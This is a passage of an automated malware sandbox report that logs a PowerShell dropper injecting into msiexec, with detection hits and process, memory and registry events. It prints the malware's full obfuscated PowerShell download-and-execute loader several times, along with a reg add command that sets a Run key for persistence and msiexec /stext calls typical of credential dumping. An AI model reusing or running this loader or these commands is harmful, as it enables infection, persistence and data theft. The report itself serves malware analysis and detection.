              Source: msiexec.exe, 0000000F.00000003.2593268088.0000000004D01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0Vhp
              Source: powershell.exe, 00000005.00000002.2410836893.000000000725E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv6E57.tmp.15.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: powershell.exe, 00000002.00000002.2263530956.00000244208E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_16-33997
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0443D6CC LdrInitializeThunk,5_2_0443D6CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21BD60E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD4AB4 mov eax, dword ptr fs:[00000030h]9_2_21BD4AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD724E GetProcessHeap,9_2_21BD724E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21BD60E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_21BD2B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21BD2639

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_2912.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTR
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B20000Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\husdhpbhpulhbvjgwsomcgo"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\spywiilbdcdmdbgkndbgftixng"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cjlgjswdrkvznhuoxonhqxvgvmwksx"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#afstrmningsforholdene mastigoneme cuspidine informers verdensbermthedernes vandforsyningsresursers vidneudsagnet #>;$databger162='usigelig';<#receptorernes preparietal kavalerers vernix eskortere betalbare #>;$afgiftssatser=$machine+$host.ui; function fyrsternes($sadlepladser){if ($afgiftssatser) {$horological++;}$krydsfinerplade=$angstneuroser+$sadlepladser.'length'-$horological; for( $swatting=4;$swatting -lt $krydsfinerplade;$swatting+=5){$gratulerende=$swatting;$renees+=$sadlepladser[$swatting];$fremtidsforskerens='butenes';}$renees;}function kaldedes($teksthistories){ . ($absolutismes) ($teksthistories);}$lively=fyrsternes ',kelme,erobaitzmagiihi hlacrol sanadsri/mose ';$lively+=fyrsternes 'jasp5feve.unpa0ga t sab.(moviwm sti,ovinn ordes uosk dwtebrs .li hjernme.atbobb smrb1ou t0marg.skov0ride;pac s bvw osihowbnscyb6test4 f i;sata po xhaug6pl m4 lon;knit f ndrb ttvstr :ga,p1ti e3none1 put.s ap0 led)out symbgsvroe rosc knok ar oalab/vars2 rem0 da.1guld0i.do0tugt1fljl0domm1jean hydf regi ch rhalielsehfgrouoespaxbli /tok 1 urf3hyra1 tal.mind0rapf ';$hairstylists=fyrsternes 'almuukrivsfor eam ersimu-kramadel gbor e amin subt loc ';$hypernic=fyrsternes 'sy ehlimptvapot annpkarbstand:supe/co p/popupfrmnlsepti t.rebeculunrit sard pro.fejltdataoekspp ple/hov kvoyavgur anormlgrilijudifistaidetecwhipesta rstudeoverdcorretricsouvr.bankq cycxpiondioej ';$torsiogram=fyrsternes 'soci>moto ';$absolutismes=fyrsternes 'u maifinae lecxnavn ';$foredragsforeninger='timetable';$overwhelmingly='\unslave.mel';kaldedes (fyrsternes 'todk$ torg skrlnon o onbsalgadistluds :episftriveunivr teki ,paa sprsobst5 s r= .ro$isomea abncatev pse:af saurstpduckpfededantiamulttkabla har+fari$geodomaimv skye hysrknejwelsdhb nde,occl olemvkkeitabsn pokg borlintey r,i ');kaldedes (fyrsternes 'i in$k,ntg ophlp ojopertbkar aamatlstol:caviuacrodslipgvarsi atifslskt spas koobr.euebotthdaaso recvresmekysttlincsbetr=vas $omstha.uryru.dpbridespa.rcitanbr ei.ilic .sn.colosdevipslicl unmilasttin e(ager$lgeet katoreinr pedsrangi bi olegeghe orbiogaar,em gro)boxb ');kaldedes (fyrsternes 'opdy[ unsnlys eadiptfoge.falssn,naesciaretervgradi afdcgeepe otopdis.o domibarynsupeth pomr craboernpiemabe ngu.dteupasrmani]part:t.ul: dems waleptercudlnu sanrf skifr stnediyomsap o erdauwokofitoutnofrydcprveoforklnost vio,= utc poll[cavan,udeep,natb ch.recestab ebr scundiuomvercentik pit trey .ntpsuper prao brit.karoentrc rbvorestl inetfolkymussphrmoe hep]redi:conn:idmttklaslguarstec 1.umo2 cra ');$hypernic=$udgiftsbehovets[0];$decalcify18=(fyrsternes '.hit$sak gbodslreemodes bfremaunprl abo:sideistelmsaecm anaoarborunentlejeaunrelslowi knasbackev ludrota=bl,anpostesoapwlbed-unmaoten.bb eojkildeunscct sttic c hy rshomoya.bes .agt onaeun emb.nd.foruntripehandt nse.malewcuereschfb impcbegel po iunace pinnzooft.kat ');kaldedes ($decalcify18);kaldedes (fyrsternes 'frem$.veria stm in.mpa mospunrpreittel ah
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#afstrmningsforholdene mastigoneme cuspidine informers verdensbermthedernes vandforsyningsresursers vidneudsagnet #>;$databger162='usigelig';<#receptorernes preparietal kavalerers vernix eskortere betalbare #>;$afgiftssatser=$machine+$host.ui; function fyrsternes($sadlepladser){if ($afgiftssatser) {$horological++;}$krydsfinerplade=$angstneuroser+$sadlepladser.'length'-$horological; for( $swatting=4;$swatting -lt $krydsfinerplade;$swatting+=5){$gratulerende=$swatting;$renees+=$sadlepladser[$swatting];$fremtidsforskerens='butenes';}$renees;}function kaldedes($teksthistories){ . ($absolutismes) ($teksthistories);}$lively=fyrsternes ',kelme,erobaitzmagiihi hlacrol sanadsri/mose ';$lively+=fyrsternes 'jasp5feve.unpa0ga t sab.(moviwm sti,ovinn ordes uosk dwtebrs .li hjernme.atbobb smrb1ou t0marg.skov0ride;pac s bvw osihowbnscyb6test4 f i;sata po xhaug6pl m4 lon;knit f ndrb ttvstr :ga,p1ti e3none1 put.s ap0 led)out symbgsvroe rosc knok ar oalab/vars2 rem0 da.1guld0i.do0tugt1fljl0domm1jean hydf regi ch rhalielsehfgrouoespaxbli /tok 1 urf3hyra1 tal.mind0rapf ';$hairstylists=fyrsternes 'almuukrivsfor eam ersimu-kramadel gbor e amin subt loc ';$hypernic=fyrsternes 'sy ehlimptvapot annpkarbstand:supe/co p/popupfrmnlsepti t.rebeculunrit sard pro.fejltdataoekspp ple/hov kvoyavgur anormlgrilijudifistaidetecwhipesta rstudeoverdcorretricsouvr.bankq cycxpiondioej ';$torsiogram=fyrsternes 'soci>moto ';$absolutismes=fyrsternes 'u maifinae lecxnavn ';$foredragsforeninger='timetable';$overwhelmingly='\unslave.mel';kaldedes (fyrsternes 'todk$ torg skrlnon o onbsalgadistluds :episftriveunivr teki ,paa sprsobst5 s r= .ro$isomea abncatev pse:af saurstpduckpfededantiamulttkabla har+fari$geodomaimv skye hysrknejwelsdhb nde,occl olemvkkeitabsn pokg borlintey r,i ');kaldedes (fyrsternes 'i in$k,ntg ophlp ojopertbkar aamatlstol:caviuacrodslipgvarsi atifslskt spas koobr.euebotthdaaso recvresmekysttlincsbetr=vas $omstha.uryru.dpbridespa.rcitanbr ei.ilic .sn.colosdevipslicl unmilasttin e(ager$lgeet katoreinr pedsrangi bi olegeghe orbiogaar,em gro)boxb ');kaldedes (fyrsternes 'opdy[ unsnlys eadiptfoge.falssn,naesciaretervgradi afdcgeepe otopdis.o domibarynsupeth pomr craboernpiemabe ngu.dteupasrmani]part:t.ul: dems waleptercudlnu sanrf skifr stnediyomsap o erdauwokofitoutnofrydcprveoforklnost vio,= utc poll[cavan,udeep,natb ch.recestab ebr scundiuomvercentik pit trey .ntpsuper prao brit.karoentrc rbvorestl inetfolkymussphrmoe hep]redi:conn:idmttklaslguarstec 1.umo2 cra ');$hypernic=$udgiftsbehovets[0];$decalcify18=(fyrsternes '.hit$sak gbodslreemodes bfremaunprl abo:sideistelmsaecm anaoarborunentlejeaunrelslowi knasbackev ludrota=bl,anpostesoapwlbed-unmaoten.bb eojkildeunscct sttic c hy rshomoya.bes .agt onaeun emb.nd.foruntripehandt nse.malewcuereschfb impcbegel po iunace pinnzooft.kat ');kaldedes ($decalcify18);kaldedes (fyrsternes 'frem$.veria stm i
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "forsnakket154" /t reg_expand_sz /d "%dyrespor% -windowstyle 1 $okkupationstropperne=(gp -path 'hkcu:\software\driftsikkerheds\').dokkedal;%dyrespor% ($okkupationstropperne)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#afstrmningsforholdene mastigoneme cuspidine informers verdensbermthedernes vandforsyningsresursers vidneudsagnet #>;$databger162='usigelig';<#receptorernes preparietal kavalerers vernix eskortere betalbare #>;$afgiftssatser=$machine+$host.ui; function fyrsternes($sadlepladser){if ($afgiftssatser) {$horological++;}$krydsfinerplade=$angstneuroser+$sadlepladser.'length'-$horological; for( $swatting=4;$swatting -lt $krydsfinerplade;$swatting+=5){$gratulerende=$swatting;$renees+=$sadlepladser[$swatting];$fremtidsforskerens='butenes';}$renees;}function kaldedes($teksthistories){ . ($absolutismes) ($teksthistories);}$lively=fyrsternes ',kelme,erobaitzmagiihi hlacrol sanadsri/mose ';$lively+=fyrsternes 'jasp5feve.unpa0ga t sab.(moviwm sti,ovinn ordes uosk dwtebrs .li hjernme.atbobb smrb1ou t0marg.skov0ride;pac s bvw osihowbnscyb6test4 f i;sata po xhaug6pl m4 lon;knit f ndrb ttvstr :ga,p1ti e3none1 put.s ap0 led)out symbgsvroe rosc knok ar oalab/vars2 rem0 da.1guld0i.do0tugt1fljl0domm1jean hydf regi ch rhalielsehfgrouoespaxbli /tok 1 urf3hyra1 tal.mind0rapf ';$hairstylists=fyrsternes 'almuukrivsfor eam ersimu-kramadel gbor e amin subt loc ';$hypernic=fyrsternes 'sy ehlimptvapot annpkarbstand:supe/co p/popupfrmnlsepti t.rebeculunrit sard pro.fejltdataoekspp ple/hov kvoyavgur anormlgrilijudifistaidetecwhipesta rstudeoverdcorretricsouvr.bankq cycxpiondioej ';$torsiogram=fyrsternes 'soci>moto ';$absolutismes=fyrsternes 'u maifinae lecxnavn ';$foredragsforeninger='timetable';$overwhelmingly='\unslave.mel';kaldedes (fyrsternes 'todk$ torg skrlnon o onbsalgadistluds :episftriveunivr teki ,paa sprsobst5 s r= .ro$isomea abncatev pse:af saurstpduckpfededantiamulttkabla har+fari$geodomaimv skye hysrknejwelsdhb nde,occl olemvkkeitabsn pokg borlintey r,i ');kaldedes (fyrsternes 'i in$k,ntg ophlp ojopertbkar aamatlstol:caviuacrodslipgvarsi atifslskt spas koobr.euebotthdaaso recvresmekysttlincsbetr=vas $omstha.uryru.dpbridespa.rcitanbr ei.ilic .sn.colosdevipslicl unmilasttin e(ager$lgeet katoreinr pedsrangi bi olegeghe orbiogaar,em gro)boxb ');kaldedes (fyrsternes 'opdy[ unsnlys eadiptfoge.falssn,naesciaretervgradi afdcgeepe otopdis.o domibarynsupeth pomr craboernpiemabe ngu.dteupasrmani]part:t.ul: dems waleptercudlnu sanrf skifr stnediyomsap o erdauwokofitoutnofrydcprveoforklnost vio,= utc poll[cavan,udeep,natb ch.recestab ebr scundiuomvercentik pit trey .ntpsuper prao brit.karoentrc rbvorestl inetfolkymussphrmoe hep]redi:conn:idmttklaslguarstec 1.umo2 cra ');$hypernic=$udgiftsbehovets[0];$decalcify18=(fyrsternes '.hit$sak gbodslreemodes bfremaunprl abo:sideistelmsaecm anaoarborunentlejeaunrelslowi knasbackev ludrota=bl,anpostesoapwlbed-unmaoten.bb eojkildeunscct sttic c hy rshomoya.bes .agt onaeun emb.nd.foruntripehandt nse.malewcuereschfb impcbegel po iunace pinnzooft.kat ');kaldedes ($decalcify18);kaldedes (fyrsternes 'frem$.veria stm in.mpa mospunrpreittel ahJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "forsnakket154" /t reg_expand_sz /d "%dyrespor% -windowstyle 1 $okkupationstropperne=(gp -path 'hkcu:\software\driftsikkerheds\').dokkedal;%dyrespor% ($okkupationstropperne)"Jump to behavior
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BD2933 cpuid 9_2_21BD2933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
